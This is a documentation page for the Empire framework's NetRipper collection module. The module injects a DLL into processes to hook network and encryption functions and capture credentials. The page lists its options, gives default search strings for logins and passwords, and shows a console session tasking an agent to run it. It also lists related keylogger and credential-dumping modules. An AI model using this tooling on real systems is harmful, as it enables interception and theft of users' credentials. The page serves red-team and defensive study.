Invoke-NetRipper - Empire Module

This page contains detailed information about how to use the powershell/collection/netripper Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-NetRipper
Module: powershell/collection/netripper
Source code [1]: empire/server/modules/powershell/collection/netripper.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-NetRipper.ps1
MITRE ATT&CK: T1179, T1410
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The netripper module injects NetRipper into targeted processes, which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the netripper module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the netripper module:

Agent
Agent to run module on.

SearchStrings
Strings to search for in traffic.
Default value: user,login,pass,database,config.

Additional Module Options

---

This is a list of additional options that are supported by the netripper module:

AllData
Switch. Log all data instead of just plaintext.

Datalimit
Data limit capture per request.
Default value: 4096.

LogLocation
Folder location to log sniffed data to.
Default value: TEMP.

ProcessID
Specific process ID to inject the NetRipper dll into.

ProcessName
Inject the NetRipper dll into all processes with the given name (i.e. putty).

Netripper Example Usage

---

Here's an example of how to use the netripper module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/netripper

 Author       Ionut Popescu (@NytroRST)                                            
              @mattifestation                                                      
              @harmj0y                                                             
 Background   True                                                                 
 Comments     https://github.com/NytroRST/NetRipper/                               
 Description  Injects NetRipper into targeted processes, which uses API hooking in 
              order to intercept network traffic and encryption related functions  
              from a low privileged user, being able to capture both plain-text    
              traffic and encrypted traffic before encryption/after decryption.    
 Language     powershell                                                           
 Name         powershell/collection/netripper                                      
 NeedsAdmin   False                                                                
 OpsecSafe    False                                                                
 Techniques   http://attack.mitre.org/techniques/T1179                             
              http://attack.mitre.org/techniques/T1410                             


,Record Options-,---------------------------------,----------,-------------------------------------,
| Name          | Value                           | Required | Description                         |
|---------------|---------------------------------|----------|-------------------------------------|
| Agent         |                                 | True     | Agent to run module on.             |
|---------------|---------------------------------|----------|-------------------------------------|
| AllData       |                                 | False    | Switch. Log all data instead of     |
|               |                                 |          | just plaintext.                     |
|---------------|---------------------------------|----------|-------------------------------------|
| Datalimit     | 4096                            | False    | Data limit capture per request.     |
|---------------|---------------------------------|----------|-------------------------------------|
| LogLocation   | TEMP                            | False    | Folder location to log sniffed data |
|               |                                 |          | to.                                 |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessID     |                                 | False    | Specific process ID to inject the   |
|               |                                 |          | NetRipper dll into.                 |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessName   |                                 | False    | Inject the NetRipper dll into all   |
|               |                                 |          | processes with the given name (i.e. |
|               |                                 |          | putty).                             |
|---------------|---------------------------------|----------|-------------------------------------|
| SearchStrings | user,login,pass,database,config | True     | Strings to search for in traffic.   |
'---------------'---------------------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/netripper) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/netripper) > set SearchStrings user,login,pass,database,config
[*] Set SearchStrings to user,login,pass,database,config
(Empire: usemodule/powershell/collection/netripper) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors

---

• Ionut Popescu (@NytroRST)
• @mattifestation
• @harmj0y

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/netripper.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/collection/Invoke-NetRipper.ps1
• https://github.com/NytroRST/NetRipper/
• http://attack.mitre.org/techniques/T1179
• http://attack.mitre.org/techniques/T1410
• https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1

See Also

---

Check also the following modules related to this module:

• powershell/collection/get_sql_query
• powershell/collection/SharpLoginPrompt
• powershell/collection/file_finder
• powershell/collection/get_indexed_item
• powershell/collection/ninjacopy
• powershell/collection/clipboard_monitor
• powershell/collection/FoxDump
• powershell/collection/prompt
• powershell/collection/minidump
• powershell/collection/SauronEye
• powershell/collection/toasted
• powershell/collection/screenshot
• powershell/collection/find_interesting_file
• powershell/collection/inveigh
• powershell/collection/browser_data
• powershell/collection/WireTap
• powershell/collection/WebcamRecorder
• powershell/collection/ChromeDump
• powershell/collection/USBKeylogger
• powershell/collection/get_sql_column_sample_data
• powershell/collection/keylogger
• powershell/collection/get-winupdates
• powershell/collection/packet_capture
• powershell/collection/SharpChromium
• powershell/collection/vaults/remove_keepass_config_trigger
• powershell/collection/vaults/add_keepass_config_trigger
• powershell/collection/vaults/keethief
• powershell/collection/vaults/find_keepass_config
• powershell/collection/vaults/get_keepass_config_trigger

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.